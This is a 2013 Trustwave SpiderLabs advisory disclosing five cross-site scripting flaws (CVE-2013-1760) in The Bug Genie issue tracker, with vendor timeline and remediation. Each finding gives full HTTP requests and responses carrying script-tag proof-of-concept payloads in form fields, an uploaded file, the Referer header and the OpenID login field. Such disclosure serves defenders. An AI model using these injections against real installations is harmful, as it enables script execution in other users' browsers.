Trustwave SpiderLabs Security Advisory TWSL2013-002:
Multiple XSS Vulnerabilities in The Bug Genie

Published: 05/14/2013
Version: 1.1

Vendor: The Bug Genie (http://www.thebuggenie.com/)
Product: The Bug Genie
Version affected:  3.2.5 and prior

Product description:
The Bug Genie is an open source issue tracking and project management
application that features an integrated wiki, support for version control
systems, and an agile development workflow. The Bug Genie is written in PHP
and has support for MySQL or PostgreSQL database backends.

Finding 1: Multiple Cross-Site Scripting Vulnerabilities
*****Credit: James Espinosa of Trustwave SpiderLabs
CVE: CVE-2013-1760
CWE: CWE-79

Example(s):
1. Performing XSS via POST request on 'description' parameter in Wiki menu.
Requires user to be authenticated.

The optional 'description' parameter when creating articles under the wiki
menu is vulnerable to persistent cross-site scripting (XSS)
vulnerabilities.

#Request
POST /buggenie/thebuggenie/attach/link/to/wiki/0 HTTP/1.1
Host: A.B.C.D
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://A.B.C.D/buggenie/thebuggenie/wiki
Content-Length: 71

link_url=testing&description=%3Cscript%3Ealert('xss')%3B%3C%2Fscript%3E

#Response
HTTP/1.1 200 OK
Date: Thu, 03 Jan 2013 20:04:23 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.4.6-1ubuntu1.1
Content-Length: 743
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/json; charset=utf-8

{"message":"Link added!","content":"<li id=\"wiki_0_links_24\" style=\"clear: both;\">\n\t\t\t\t\t\t<a href=\"\/buggenie\/thebuggenie\/wiki\/testing\"><script>alert('xss');<\/script><\/a>\t\t\t\t\t\t<a class=\"button button-icon button-silver\" style=\"float: right;\" onclick=\"TBG.Main.Helpers.Dialog.show('Please confirm', 'Do you really want to delete this link?', {yes: {click: function() {TBG.Main.Link.remove('\/buggenie\/thebuggenie\/upload\/remove\/link\/24\/from\/other\/wiki\/0', 'wiki', '0', 24); TBG.Main.Helpers.Dialog.dismiss(); }}, no: {click: TBG.Main.Helpers.Dialog.dismiss}})\" href=\"javascript:void(0);\"><img src=\"\/buggenie\/thebuggenie\/iconsets\/oxygen\/action_delete.png\" alt=\"action_delete.png\"><\/a>\t<\/li>\n"}


2. Performing XSS via POST request on 'description' parameter in issue
reporting. Requires user to be authenticated.

The 'description' parameter when reporting an issue of any type (bug
report, enhancement, or feature request) is vulnerable to persistent
cross-site scripting (XSS) vulnerabilities.

#Request
POST /buggenie/thebuggenie/sampleproject3/issues/new HTTP/1.1
Host: A.B.C.D
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://A.B.C.D/buggenie/thebuggenie/sampleproject3/issues/new/issuetype/bugreport
Content-Type: application/x-www-form-urlencoded
Content-Length: 382

project_id=6&title=XSS+Vulnerability&issuetype_id=1&description=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&reproduction_steps=None&build_id=&category_id=&reproducability_id=&milestone_id=&estimated_time=&percent_complete=&priority_id=&resolution_id=&severity_id=

#Response
HTTP/1.1 200 OK
Date: Thu, 03 Jan 2013 21:21:16 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.4.6-1ubuntu1.1
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 17784
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<--SNIP-->
		<form id="description_form" action="/buggenie/thebuggenie/sampleproject3/issues/110/set/description" method="post" onSubmit="TBG.Issues.Field.set('/buggenie/thebuggenie/sampleproject3/issues/110/set/description', 'description'); return false;">
		<textarea name="value" id="description_form_value" style="height: 250px; width: 100%;"><script>alert('xss');</script></textarea>
<--SNIP-->

3. Performing XSS via POST request in file attachments. Requires user to be authenticated.

If file attachments are enabled, persistent cross-site scripting
vulnerabilities exist within the embedded content of the file if it is
viewed by the user. To replicate the issue, a text file called 'xss.txt'
was created and javascript code such as "<script>prompt(1)</script>" was
added.

#Request
POST /thebuggenie/upload/to/issue/19 HTTP/1.1
Host: A.B.C.D
Accept-Encoding: gzip, deflate
Referer: http://A.B.C.D/thebuggenie/sampleproject1/issues/10
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------16412545751381963101235559763
Content-Length: 913

-----------------------------16412545751381963101235559763
Content-Disposition: form-data; name="MAX_FILE_SIZE"

2097152
-----------------------------16412545751381963101235559763
Content-Disposition: form-data; name="APC_UPLOAD_PROGRESS"


-----------------------------16412545751381963101235559763
Content-Disposition: form-data; name="uploader_file"; filename="xss.txt"
Content-Type: text/plain

<script>prompt(1)</script>

-----------------------------16412545751381963101235559763
Content-Disposition: form-data; name="uploader_file_description"

-----------------------------16412545751381963101235559763
Content-Disposition: form-data; name="comment"

-----------------------------16412545751381963101235559763
Content-Disposition: form-data; name="submit"

Upload and attach
-----------------------------16412545751381963101235559763--

#Response
HTTP/1.1 302 Found
Date: Thu, 03 Jan 2013 22:15:27 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.4.6-1ubuntu1.2
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: /thebuggenie/sampleproject1/issues/10
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

#Request
GET /thebuggenie/files/show/1 HTTP/1.1
Host: A.B.C.D
Accept-Encoding: gzip, deflate
Referer: http://192.168.64.250/thebuggenie/sampleproject1/issues/10
Connection: keep-alive

#Response
HTTP/1.1 200 OK
Date: Thu, 03 Jan 2013 22:17:32 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.4.6-1ubuntu1.2
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-disposition: inline; filename="xss.txt"
Vary: Accept-Encoding
Content-Length: 27
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

<script>prompt(1)</script>

4. Performing XSS via GET request in referer header during pre-authentication.

Multiple reflective cross-site scripting vulnerabilities exist in the
referer header of the 'account,' 'dashboard,' and '/get/partials/login'
page requests.


#Request
GET /bugs/thebuggenie/dashboard HTTP/1.1
Host: A.B.C.D
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://A.B.C.D/"><script>alert(1)</script>08c99f07c55

#Response
<--SNIP-->
id="tbg3_referer" name="tbg3_referer" value="http://A.B.C.D/"><script>alert(1)</script>08c99f07c55" />
<--SNIP-->


5. Performing XSS via POST request on 'openid_identifier' parameter in login
during preauth.

The 'openid_identifier' parameter in the login page of the application
contains reflective cross-site scripting vulnerabilities.

#Request
POST /bugs/thebuggenie/do/login HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:17.0) Gecko/20100101 Firefox/17.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://127.0.0.1/bugs/thebuggenie/
Content-Length: 49
Cookie: tbg3_password=%242a%2407%245c3846ca908da1d034a46O%2FrEDnK2k4Y8I3EEqIpMqoIC.GCHVN%2Fq; THEBUGGENIE=7kvml6kv5t5gptd5c217l0b7r0
Pragma: no-cache
Cache-Control: no-cache

openid_identifier=<script>alert(1)</script>

#Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Jan 2013 21:36:25 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: tbg3_password=%242a%2407%245c3846ca908da1d034a46O%2FrEDnK2k4Y8I3EEqIpMqoIC.GCHVN%2Fq; expires=Fri, 18-Jan-2013 21:36:25 GMT; path=/bugs/thebuggenie/
Set-Cookie: tbg3_username=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/bugs/thebuggenie/
Last-Modified: Tue, 08 Jan 2013 21:36:25 GMT
x-tbg-debugid: 
Content-Length: 71
Content-Type: application/json; charset=utf-8

{"error":"Could not connect to http:\/\/<script>alert(1)<\/script>."}

Remediation Steps:
The vendor has released a fix to address examples #1, #2, #4 and #5 in Bug
Genie 3.2.5. However, fixes for example #2 and #5 were discovered as
incomplete and the vendor released Bug Genie 3.2.6 to addresses these
issues.  Currently, no fix is available to address example #3.

These issue can also be mitigated with the use of technologies, such as Web
Application Firewalls (WAF) or Intrusion Prevention Systems (IPS). Often,
Vulnerability Scanners and Intrusion Detection Systems (IDS) can detect the
presence of Local File Inclusion vulnerabilities and XSS. Trustwave
technologies that address this issue include the following.

ModSecurity (http://www.modsecurity.org/) has added rules to the commercial
rules feed for these issues, available as part of the SpiderLabs
ModSecurity rules feed.

References
1. http://www.thebuggenie.com/security/TBGSN-002-2
2. http://blog.spiderlabs.com/

Vendor Communication Timeline:
01/22/13 - Initial communications with vendor
01/22/13 - Vulnerability disclosed to vendor
02/18/13 - Vendor acknowledges security issue
02/18/13 - CVE issued
02/22/13 - Sent follow-up regarding unaddressed vulnerability
02/28/13 - Vendor releases fixes
03/14/13 - Attempt to follow-up with vendor
04/03/13 - Attempt to follow-up with vendor about incomplete fixes
05/03/13 - Attempt to follow-up with vendor about incomplete fixes
05/09/13 - Advisory published
05/10/13 - Vendor releases fixes
05/14/13 - Advisory revision published

About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com

About Trustwave's SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.